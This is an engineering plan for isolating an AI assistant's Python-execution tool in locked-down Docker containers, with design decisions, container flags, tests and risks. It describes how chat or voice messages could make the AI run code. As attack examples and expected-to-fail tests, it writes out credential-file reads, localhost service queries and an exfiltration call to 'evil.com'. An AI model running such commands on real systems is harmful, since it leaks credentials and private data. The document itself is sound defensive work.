# Plan: Docker Sandbox for Annie's `execute_python`

## Context

Session 366 sandboxed Claude CLI via Telegram using Docker containers (NemoClaw-inspired 4-layer isolation). During verification, we discovered Annie's `execute_python` tool has **zero isolation** — `code_tools.py:_run_code_sync()` runs arbitrary Python as UID 1000 with `env=os.environ.copy()`, giving full filesystem, network, and credential access. The only protections are 4 string-matched blocked imports (trivially bypassable via `__import__()`) and process rlimits.

**Attack vector**: Any Telegram message or voice command can trigger `execute_python` with code like `open('/home/rajesh/.claude/.credentials.json').read()` or `requests.get("http://localhost:8100/v1/entities")`.

**Goal**: Run all `execute_python` code inside ephemeral Docker containers with no host credentials, read-only filesystem, sanitized environment, and **zero network access**. Preserve existing behavior (matplotlib images, voice/text timeouts, output format).

## Review History

- **Round 1**: 27 issues from architecture + code quality destruction reviews (19 implemented, 2 accepted, 2 rejected, 2 resolved, 2 deferred)
- **Round 2**: NemoClaw comparison + hostile security architect critique of our NemoClaw analysis. Key finding: **`--network=host` + iptables is fundamentally broken** (host rule pollution, NET_ADMIN contradiction, concurrent container races). Solution: `--network=none`.

### Critical changes from Round 2:
- **`--network=none`** replaces `--network=host` + iptables — eliminates ALL network attack surface (SSRF, DNS rebinding, localhost service access, external exfiltration)
- **No iptables** — removed from Dockerfile, no `NET_ADMIN` needed
- **Landlock LSM** — zero-cost defense-in-depth in `sandbox_runner.py` (restrict file access to `/tmp` + `/output` only)
- **Pinned pip packages** — exact versions + `--require-hashes` in requirements file
- **No `shell=True`** — explicit guard comment in `build_docker_cmd`

## Design Decisions

| # | Decision | Rationale |
|---|----------|-----------|
| D1 | Module at `services/annie-voice/python_sandbox.py` | Both callers (voice + text chat) live in annie-voice |
| D2 | Keep API synchronous | `_run_code_sync` is sync, called via `run_in_executor` by both paths — no caller changes |
| D3 | tmpfs `/output` for matplotlib | Docker-managed tmpfs, no host dir. Base64 extracted via stdout sentinel in `sandbox_runner.py` |
| D4 | Bake all deps into pinned image | `python:3.12.8-slim-bookworm` + pinned numpy/matplotlib/pandas/scipy/sklearn with hashes |
| D5 | Pass code via stdin | List-form `subprocess.run` (NEVER `shell=True`). Avoids bind-mounting host temp files |
| D6 | Sanitize ALL env vars | Pass only `MPLBACKEND`, `OPENBLAS_NUM_THREADS`, `OMP_NUM_THREADS`, `MKL_NUM_THREADS`, `HOME` |
| D7 | RLIMIT_CPU inside container | Timeout passed as CLI arg (not hardcoded). Outer timeout = inner + 10s grace |
| D8 | **No fallback** — tool disabled when sandbox unavailable | Silent fallback = silent security regression. Tool returns error message instead |
| D9 | **`--network=none`** — total network isolation | Code execution does not need network. yt-dlp stays in image (for parsing) but downloads will fail with `ConnectionError`. Eliminates: SSRF, DNS rebinding, localhost access, exfiltration, iptables complexity, NET_ADMIN |
| D10 | **Landlock LSM** in sandbox_runner.py | Zero-cost on Linux 6.17 (Titan). Restricts file access to `/tmp` + `/output` only. Prevents symlink traversal in writable tmpfs |

### NemoClaw Comparison (what we adopted vs. skipped)

| NemoClaw Feature | Our Status | Rationale |
|------------------|-----------|-----------|
| Filesystem: Landlock LSM | **ADOPTED** | Zero-cost, prevents tmpfs symlink traversal |
| Network: deny-by-default whitelist | **ADOPTED** (as `--network=none`) | Stronger: no network at all, vs NemoClaw's per-endpoint whitelist |
| Network: SSRF validation (ssrf.ts) | **Not needed** | `--network=none` eliminates the entire attack class |
| Network: binary-level ACLs | **Not needed** | No network = no exfiltration regardless of binary |
| Process: non-root + cap-drop ALL | **ADOPTED** | Same pattern |
| Process: two-user privilege separation | **Skipped** | No gateway/enforcer process to protect. Single ephemeral runner |
| Tools: operator approval TUI | **Skipped** | Headless ephemeral sandbox, no operator present |
| Config: immutable/mutable split | **Skipped** | No persistent config — everything is tmpfs |
| Supply chain: SHA256 verification | **ADOPTED** | `--require-hashes` in pip requirements |
| C-2: no shell interpolation | **ADOPTED** | Explicit guard comment + list-form subprocess |
| C-4: path traversal protection | **Covered by Landlock** | Landlock restricts accessible paths kernel-side |

---

## Phase 0: Dockerfile + Container Entrypoint

### Step 0a: Benchmark Docker startup on Titan

Before committing to this architecture, measure container startup latency:
```bash
# On Titan — run 10 times, measure p50/p99
for i in $(seq 10); do
  time echo 'print("ok")' | docker run --rm -i --network=none python-sandbox:latest --timeout 10
done
```

**Gate**: If p99 > 1.5s, implement pre-warmed container pool. If p99 < 1s, proceed with ephemeral containers.

### Step 0b: New `services/annie-voice/Dockerfile.python-sandbox`

```dockerfile
FROM python:3.12.8-slim-bookworm

ENV DEBIAN_FRONTEND=noninteractive

# System deps for matplotlib (freetype, png) and scipy (OpenBLAS)
# No iptables needed — using --network=none (total isolation)
RUN apt-get update && apt-get install -y --no-install-recommends \
    libfreetype6 libpng16-16 libopenblas0 \
    && rm -rf /var/lib/apt/lists/*

# Data science libraries — pinned versions with hash verification
COPY requirements-sandbox.txt /tmp/requirements-sandbox.txt
RUN pip install --no-cache-dir --require-hashes -r /tmp/requirements-sandbox.txt \
    && rm /tmp/requirements-sandbox.txt

# Pre-warm matplotlib font cache (saves ~300ms on first import)
RUN python3 -c "import matplotlib.pyplot"

# Non-root sandbox user
RUN groupadd -r sandbox \
    && useradd -r -g sandbox -d /home/sandbox -m -s /bin/bash sandbox

# Container entrypoint
COPY sandbox_runner.py /usr/local/bin/sandbox_runner.py

WORKDIR /home/sandbox
USER sandbox
ENTRYPOINT ["python3", "/usr/local/bin/sandbox_runner.py"]
```

### Step 0b-ii: New `services/annie-voice/requirements-sandbox.txt`

Pinned versions with hashes (generated via `pip-compile --generate-hashes`):

```
numpy==1.26.4 --hash=sha256:...
matplotlib==3.9.2 --hash=sha256:...
pandas==2.2.3 --hash=sha256:...
seaborn==0.13.2 --hash=sha256:...
scikit-learn==1.5.2 --hash=sha256:...
scipy==1.14.1 --hash=sha256:...
sympy==1.13.3 --hash=sha256:...
Pillow==10.4.0 --hash=sha256:...
yt-dlp==2024.12.23 --hash=sha256:...
```

Exact hashes to be generated on Titan (aarch64) via:
```bash
pip install pip-tools && pip-compile --generate-hashes requirements-sandbox.in
```

### Step 0c: New `services/annie-voice/sandbox_runner.py` (~100 lines)

Container entrypoint that:
1. **Apply Landlock** (Linux 6.17): restrict filesystem access to `/tmp` (rw), `/output` (rw), `/usr` (ro), `/lib` (ro) only. Uses `landlock.restrict_self()` or raw syscall via `ctypes` if `landlock` module unavailable. Best-effort: skip with warning if kernel doesn't support it.
2. Read Python code from stdin
3. Set `RLIMIT_CPU` to `--timeout` value (CLI arg, not hardcoded)
4. Write code to `/tmp/script.py`
5. Run via `subprocess.run([sys.executable, "/tmp/script.py"], cwd="/tmp", timeout=timeout)`
   - **CRITICAL: NEVER use `shell=True`** — prevents command injection
6. **Structured error output**: Print JSON status to stderr first line: `{"runner_status": "ok"}` or `{"runner_status": "error", "msg": "..."}`. Host parses this to distinguish runner failures from code failures.
7. **Matplotlib extraction**: After code finishes, check if `/output/plot.png` exists. If yes, print `\n__MATPLOTLIB_BASE64__\n{base64_data}` to stdout. Host splits on sentinel.
8. Exit with subprocess exit code

### Verify
- `docker build -t python-sandbox:latest -f Dockerfile.python-sandbox .`
- `echo 'print("hello")' | docker run --rm -i --network=none python-sandbox:latest --timeout 10`
- `echo 'import numpy; print(numpy.__version__)' | docker run --rm -i --network=none python-sandbox:latest --timeout 10`
- `echo 'import socket; socket.create_connection(("1.1.1.1", 80))' | docker run --rm -i --network=none python-sandbox:latest --timeout 10` → should fail with network error
- Benchmark 10 runs, record p50/p99

---

## Phase 1: Core Sandbox Module

### New: `services/annie-voice/python_sandbox.py` (~280 lines)

Pattern: `services/telegram-bot/docker_sandbox.py` with all review fixes applied.

**Constants**:
```python
PYTHON_SANDBOX_IMAGE = os.getenv("PYTHON_SANDBOX_IMAGE", "python-sandbox:latest")
PYTHON_SANDBOX_CPUS = os.getenv("PYTHON_SANDBOX_CPUS", "1.0")
CONTAINER_PREFIX = "python-sandbox"
MAX_CONCURRENT = 3  # Semaphore cap — prevents Docker daemon OOM
_DOCKER_HEALTH_TTL = 60  # Re-check Docker health every 60s
_MATPLOTLIB_SENTINEL = "\n__MATPLOTLIB_BASE64__\n"
```

**Module state**:
```python
_sandbox_available: bool = False
_last_health_check: float = 0.0           # monotonic timestamp
_active_containers: dict[str, str] = {}   # execution_id -> container_name
_semaphore = threading.Semaphore(MAX_CONCURRENT)
```

**Functions**:

| Function | Sync/Async | Purpose |
|----------|-----------|---------|
| `check_sandbox_requirements() -> (bool, str)` | Sync | Startup: Docker binary, daemon, image, orphan sweep. Sets `_sandbox_available` |
| `is_available() -> bool` | Sync | Cached health check — re-runs `docker info` if stale (>60s). Returns False if Docker died at runtime |
| `build_docker_cmd(execution_id, *, memory, timeout) -> (list, str)` | Sync | Constructs `docker run` command. **NEVER shell=True.** |
| `run_code_sandboxed(code, uses_matplotlib, *, timeout, memory) -> dict` | Sync | Main entry: acquires semaphore, runs Docker, parses output, returns result dict |
| `_cleanup_orphaned_containers()` | Sync | `docker ps -aq --filter name=python-sandbox` + `docker rm -f` |
| `cleanup_all_containers()` | Sync | Kills all in `list(_active_containers.items())` — snapshot before iteration |

**Docker command** (from `build_docker_cmd`):
```
docker run --rm -i
  --name python-sandbox-{uuid4().hex[:12]}
  --user {uid}:{gid}
  --read-only
  --tmpfs /tmp:rw,noexec,size=50m,uid={uid},gid={gid}
  --tmpfs /home/sandbox:rw,noexec,size=50m,uid={uid},gid={gid}
  --tmpfs /output:rw,noexec,size=20m,uid={uid},gid={gid}
  --network none
  --memory {512m|1g} --memory-swap {same}
  --cpus 1.0
  --pids-limit 128
  --security-opt no-new-privileges
  --cap-drop ALL
  -e HOME=/home/sandbox
  -e MPLBACKEND=Agg
  -e OPENBLAS_NUM_THREADS=1
  -e OMP_NUM_THREADS=1
  -e MKL_NUM_THREADS=1
  python-sandbox:latest
  --timeout {10|30}
```

**Key security properties**:
- **`--network none`** — zero network access. No SSRF, no DNS rebinding, no localhost, no exfiltration. No iptables needed. No NET_ADMIN needed.
- **No host bind-mounts** — fully isolated filesystem
- **`noexec` on tmpfs** — prevents executing binaries from writable dirs (defense-in-depth with Landlock)
- **`uuid4().hex[:12]`** — 48-bit container names
- **Env whitelist** — only 5 safe vars passed. No secrets leak.

**Matplotlib output flow** (stdout sentinel):
1. User code runs, matplotlib auto-save writes to `/output/plot.png` (container tmpfs)
2. `sandbox_runner.py` checks `/output/plot.png` after code finishes
3. If exists: prints `\n__MATPLOTLIB_BASE64__\n{base64_data}` to stdout
4. Host-side `run_code_sandboxed` splits stdout on `_MATPLOTLIB_SENTINEL`
5. Text before sentinel = real stdout. Text after = base64 image data.

**`run_code_sandboxed` flow**:
1. Acquire `_semaphore` (max 3 concurrent). If blocked >5s, return error "Code execution busy"
2. Check `is_available()` (cached Docker health). If False, return error
3. If `uses_matplotlib`: inject auto-save snippet (`plt.savefig("/output/plot.png", dpi=150, bbox_inches='tight')`)
4. Build Docker command via `build_docker_cmd` — **list-form only, NEVER shell=True**
5. Track: `_active_containers[exec_id] = container_name`
6. Run `subprocess.run(cmd, input=code.encode(), timeout=timeout+10, capture_output=True)`
   - Extra 10s grace for Docker startup + teardown beyond inner timeout
7. **Check returncode**: 137 → "Out of memory", 139 → "Killed by signal"
8. **Parse stderr first line**: JSON `runner_status`. If `"error"`, return runner error (not user code error)
9. **Parse stdout**: split on `_MATPLOTLIB_SENTINEL`. Before = stdout, after = image base64
10. Truncate stdout/stderr (reuse `_truncate()` from code_tools)
11. Cleanup: pop from `_active_containers`, release `_semaphore` (in `finally` block)
12. Return `{"stdout", "stderr", "returncode", "image_base64"}`

### Verify
- Unit tests (Phase 4)

---

## Phase 2: Wire Into `code_tools.py`

### Modify: `services/annie-voice/code_tools.py` (~25 lines changed)

1. **Import** `python_sandbox` at top
2. **Replace** `_run_code_sync` body — no fallback, no rename:

```python
def _run_code_sync(code, uses_matplotlib, timeout=None, memory_limit=None):
    """Run Python code in Docker sandbox (mandatory — no unsandboxed fallback)."""
    if not python_sandbox.is_available():
        return {
            "stdout": "",
            "stderr": "Code execution is temporarily unavailable (sandbox offline).",
            "returncode": 1,
            "image_base64": None,
        }
    _timeout = timeout or TIMEOUT_SECONDS
    _mem = _format_docker_memory(memory_limit or MEMORY_LIMIT_BYTES)
    return python_sandbox.run_code_sandboxed(
        code, uses_matplotlib, timeout=_timeout, memory=_mem,
    )
```

3. **Add** `_format_docker_memory(bytes_limit: int) -> str` helper (512MB → "512m", 1GB → "1g")
4. **Remove** `_BLOCKED_IMPORTS` check entirely — `--network=none` + Docker isolation replaces it
5. **Remove** old `_run_code_sync` implementation (subprocess with `preexec_fn`), the `_set_resource_limits()` function, and the `resource` import
6. **Keep** `_truncate()`, constants, `register_code_tools`, `handle_execute_python` unchanged

**No changes needed** in `handle_execute_python`, `register_code_tools`, or `text_llm.py:685-706` — they call `_run_code_sync` which transparently delegates.

### Modify: `services/annie-voice/text_llm.py` (minimal)

- `_scrub_secrets()` call at line 701-706 stays — defense-in-depth
- Add comment: `# _scrub_secrets is redundant with Docker sandbox env isolation but kept for defense-in-depth`
- Bump `_code_executor = ThreadPoolExecutor(max_workers=3)` (was 2, match semaphore cap)

### Verify
- Existing `test_code_tools.py` tests pass (with `python_sandbox.is_available` mocked)
- New sandbox-mode tests (Phase 4)

---

## Phase 3: Server Lifecycle + Deployment Integration

### Modify: `services/annie-voice/server.py` (~10 lines)

**Startup** — add after step 8 (checkpoint scan), before "All background services started":
```python
# 9. Python code execution sandbox
import python_sandbox
ok, reason = python_sandbox.check_sandbox_requirements()
if ok:
    logger.info("Python sandbox: ready")
else:
    logger.warning("Python sandbox: {} — execute_python tool DISABLED", reason)
```

**Shutdown** — add before "All background services stopped":
```python
try:
    import python_sandbox
    python_sandbox.cleanup_all_containers()
except Exception:
    pass
```

### Modify: `start.sh` — `start_annie()` function (~8 lines)

Add after line 520 (mkdir for kernel dirs), before the `ssh -f` that starts the server:
```bash
# Python code execution sandbox image (REQUIRED — service won't execute code without it)
if ! ssh "$TITAN_HOST" "docker image inspect python-sandbox:latest" >/dev/null 2>&1; then
    echo -e "  ${YELLOW}Building Python sandbox image...${NC}"
    ssh "$TITAN_HOST" "cd $TITAN_PROJECT/services/annie-voice && \
        docker build -t python-sandbox:latest -f Dockerfile.python-sandbox ." 2>&1 | tail -1
    if ! ssh "$TITAN_HOST" "docker image inspect python-sandbox:latest" >/dev/null 2>&1; then
        echo -e "  ${RED}Python sandbox image build FAILED — execute_python will be disabled${NC}"
    fi
fi
```

### New: `services/annie-voice/setup-python-sandbox.sh` (~50 lines)

Idempotent setup (pattern: `services/telegram-bot/setup-claude-sandbox.sh`):
1. Build Docker image (skip if exists, `--rebuild` flag to force)
2. Verify libraries: `docker run --rm --network=none python-sandbox:latest python3 -c "import numpy, matplotlib, pandas, scipy, sklearn; print('OK')"`
3. Verify network isolation: `docker run --rm --network=none python-sandbox:latest python3 -c "import socket; socket.create_connection(('1.1.1.1', 80))"` → must fail
4. Report image size

### New: `services/annie-voice/verify-python-sandbox.sh` (~100 lines)

Run inside container to verify isolation:
1. **Filesystem**: Cannot read `/home/rajesh`, `/etc/shadow`. CAN write to `/tmp`, `/output`
2. **Environment**: No `ANTHROPIC_API_KEY`, `CONTEXT_ENGINE_TOKEN`, `TELEGRAM_BOT_TOKEN` in env
3. **Network**: ALL network connections fail (`--network=none`). Test: `python3 -c "import socket; socket.create_connection(('1.1.1.1', 80))"` → must fail
4. **Process**: Running as non-root, UID != 0, CapEff = 0
5. **Read-only**: Cannot `pip install`, cannot write to `/usr`
6. **Libraries**: numpy, matplotlib, pandas, scipy, sklearn all importable
7. **Config**: `MPLBACKEND=Agg`, `OPENBLAS_NUM_THREADS=1`

### Verify
- `bash setup-python-sandbox.sh` on Titan — image builds
- `verify-python-sandbox.sh` inside container — all PASS
- `start.sh` builds image on first deploy, warns on failure

---

## Phase 4: Tests

### New: `services/annie-voice/tests/test_python_sandbox.py` (~450 lines, ~45 tests)

Pattern: `services/telegram-bot/tests/test_docker_sandbox.py`

| Test Class | Tests | What |
|-----------|-------|------|
| `TestBuildDockerCmd` | ~14 | Command structure, `--read-only`, `--network none`, tmpfs mounts (3: /tmp, /home, /output) with `noexec`, no host bind-mounts, `--cap-drop ALL`, `no-new-privileges`, env whitelist (no secrets), `uuid[:12]` names, resource limits, no `shell=True` anywhere |
| `TestRunCodeSandboxed` | ~12 | Print, syntax error, matplotlib (sentinel parsing), empty code, timeout, Docker not found, OOM (rc=137), truncation, semaphore blocking, runner JSON error parsing |
| `TestIsAvailable` | ~5 | Cached health check, TTL expiry re-checks Docker, Docker death at runtime flips flag |
| `TestCheckSandboxRequirements` | ~5 | Docker binary, daemon, image, orphan cleanup, flag setting |
| `TestContainerLifecycle` | ~5 | Orphan cleanup, shutdown cleanup (`list()` snapshot), semaphore release on error/timeout |
| `TestConcurrency` | ~3 | Semaphore blocks 4th concurrent call, timeout on semaphore acquire returns error |
| `TestDisabledBehavior` | ~3 | When unavailable: returns error dict, no subprocess spawned |

### Modify: `services/annie-voice/tests/test_code_tools.py` (~40 lines)

- Add `@patch("code_tools.python_sandbox")` to existing `_run_code_sync` tests
- Mock `python_sandbox.is_available()` → True, `run_code_sandboxed()` → returns expected dict
- Add `TestSandboxDelegation` class (~5 tests):
  - `_run_code_sync` calls `run_code_sandboxed` when available
  - `_run_code_sync` returns error dict when unavailable (no fallback)
  - `_format_docker_memory` converts bytes correctly (512MB→"512m", 1GB→"1g")
  - Verify `_BLOCKED_IMPORTS` is removed (no string match check)

### Verify
- `cd services/annie-voice && python -m pytest tests/test_python_sandbox.py -v` — all pass
- `cd services/annie-voice && python -m pytest tests/test_code_tools.py -v` — all pass
- `cd services/annie-voice && python -m pytest tests/ -v` — full suite green

---

## Phase 5: Deploy & E2E Verify

1. `bash setup-python-sandbox.sh` on Titan
2. **Benchmark**: Run 10x startup latency test (Phase 0a). Record p50/p99.
3. Restart annie-voice via `start.sh`
4. Check logs: `ssh titan "grep 'Python sandbox' /tmp/annie-voice.log"` — should say "ready"
5. **E2E tests** (manual via Telegram text chat):
   - `print("hello")` → returns "hello" (basic execution)
   - `import numpy; print(numpy.__version__)` → version string (library access)
   - `import matplotlib.pyplot as plt; plt.plot([1,2,3]); plt.show()` → image_base64 in result
   - `import os; print(dict(os.environ))` → NO secrets (only MPLBACKEND, OPENBLAS, etc.)
   - `print(open('/home/rajesh/.env').read())` → FileNotFoundError (no host mount)
   - `print(open('/home/rajesh/.claude/.credentials.json').read())` → FileNotFoundError
   - `import subprocess; subprocess.run(['cat', '/etc/hostname'], capture_output=True, text=True).stdout` → container hostname, not Titan
   - `import socket; socket.create_connection(("1.1.1.1", 80))` → **OSError: network unreachable** (`--network=none`)
   - `import socket; socket.create_connection(("localhost", 8100))` → **OSError: network unreachable**
   - `import requests; requests.get("http://evil.com/exfil")` → **ConnectionError** (no network)
6. `bash verify-python-sandbox.sh` inside container — all PASS

---

## File Inventory

| Action | File | Est. Lines |
|--------|------|-----------|
| NEW | `services/annie-voice/Dockerfile.python-sandbox` | ~25 |
| NEW | `services/annie-voice/requirements-sandbox.txt` | ~30 (pinned versions + hashes) |
| NEW | `services/annie-voice/sandbox_runner.py` | ~100 |
| NEW | `services/annie-voice/python_sandbox.py` | ~280 |
| NEW | `services/annie-voice/setup-python-sandbox.sh` | ~50 |
| NEW | `services/annie-voice/verify-python-sandbox.sh` | ~100 |
| NEW | `services/annie-voice/tests/test_python_sandbox.py` | ~450 |
| MODIFY | `services/annie-voice/code_tools.py` | ~25 lines changed |
| MODIFY | `services/annie-voice/text_llm.py` | ~5 lines changed |
| MODIFY | `services/annie-voice/server.py` | ~10 lines added |
| MODIFY | `services/annie-voice/tests/test_code_tools.py` | ~40 lines added |
| MODIFY | `start.sh` | ~8 lines added |

## Security Architecture (4 layers)

| Layer | Mechanism | What It Blocks |
|-------|-----------|---------------|
| **1. Filesystem** | `--read-only` root + tmpfs (`noexec`) for /tmp, /home, /output. No host mounts. Landlock LSM restricts accessible paths. | Host credential reads, filesystem escape, exec from tmpfs |
| **2. Network** | **`--network=none`** — zero network stack | ALL network: SSRF, DNS rebinding, localhost services, external exfiltration, raw sockets |
| **3. Environment** | Explicit `-e` whitelist (5 vars). No `os.environ.copy()`. No secrets. | Env var credential leaks (ANTHROPIC_API_KEY, tokens, etc.) |
| **4. Process** | Non-root sandbox user, `--cap-drop ALL`, `no-new-privileges`, 128 PIDs, 512MB-1GB RAM, 1 CPU, RLIMIT_CPU inside container | Privilege escalation, resource exhaustion, fork bombs |

**vs. NemoClaw**: Our Layer 2 (`--network=none`) is STRONGER than NemoClaw's endpoint whitelist — we block everything, they allow specific endpoints. Our Layer 1 adds Landlock (same as NemoClaw). We skip NemoClaw's binary ACLs, operator TUI, and config split because our threat model is simpler (ephemeral code execution, not long-lived multi-tool agent).

## Pre-Mortem Failure Analysis

| # | Failure Scenario | Category | Likelihood | Impact | Mitigation |
|---|-----------------|----------|------------|--------|------------|
| 1 | Docker daemon OOM from concurrent containers | Resource | LOW | HIGH | Semaphore caps at 3 containers |
| 2 | Docker dies at runtime, flag stale | Temporal | MEDIUM | HIGH | Cached health check re-validates every 60s |
| 3 | Container OOM kill (exit 137) looks like code error | Silent | MEDIUM | LOW | Explicit OOM detection on rc=137 |
| 4 | Image build fails, `start.sh` continues | Cascade | MEDIUM | HIGH | Build failure logged; sandbox check at startup disables tool |
| 5 | Voice latency budget consumed by Docker startup | Performance | MEDIUM | MEDIUM | Benchmark gate (Phase 0a). Pool if p99>1.5s |
| 6 | Supply chain attack on pip packages in image | Silent | LOW | CRITICAL | `--require-hashes` pins every package + hash |
| 7 | yt-dlp code fails due to `--network=none` | Functional | HIGH | LOW | Expected behavior. yt-dlp parsing works offline; downloads fail with clear error |

## Risks

| Risk | Impact | Mitigation |
|------|--------|------------|
| Docker startup latency (+200-500ms) | 2-5% of 10s voice timeout | Benchmark gate; pool fallback if needed |
| Image size ~800MB | Disk on 3.84TB SSD | Negligible |
| yt-dlp downloads fail (`--network=none`) | Users can't download videos in code | Separate `web_search`/`browse_webpage` tools handle fetching. Clear error message. |
| aarch64 image build | Package issues possible | Builds natively on Titan; pinned base image |
| Landlock not supported | Falls back gracefully | Best-effort: skip with warning if kernel rejects |